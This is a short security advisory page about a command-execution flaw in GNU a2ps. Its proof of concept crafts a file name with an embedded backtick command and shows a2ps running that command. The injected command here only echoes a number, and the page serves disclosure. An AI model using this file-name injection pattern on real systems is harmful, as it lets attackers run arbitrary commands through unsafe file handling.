GNU a2ps File Name Command Execution Vulnerability

No exploit it required to leverage this issue. The following proof of concept has been provided:

The issue can be illustrated with the following set of shell commands:

$ touch 'x`echo >&2 42`.c'
$ a2ps -o /dev/null *.c
42
[x`echo >&2 42`.c (C): 0 pages on 0 sheets]
[Total: 0 pages on 0 sheets] saved into the file `/dev/null'


 

Privacy Statement
Copyright 2010, SecurityFocus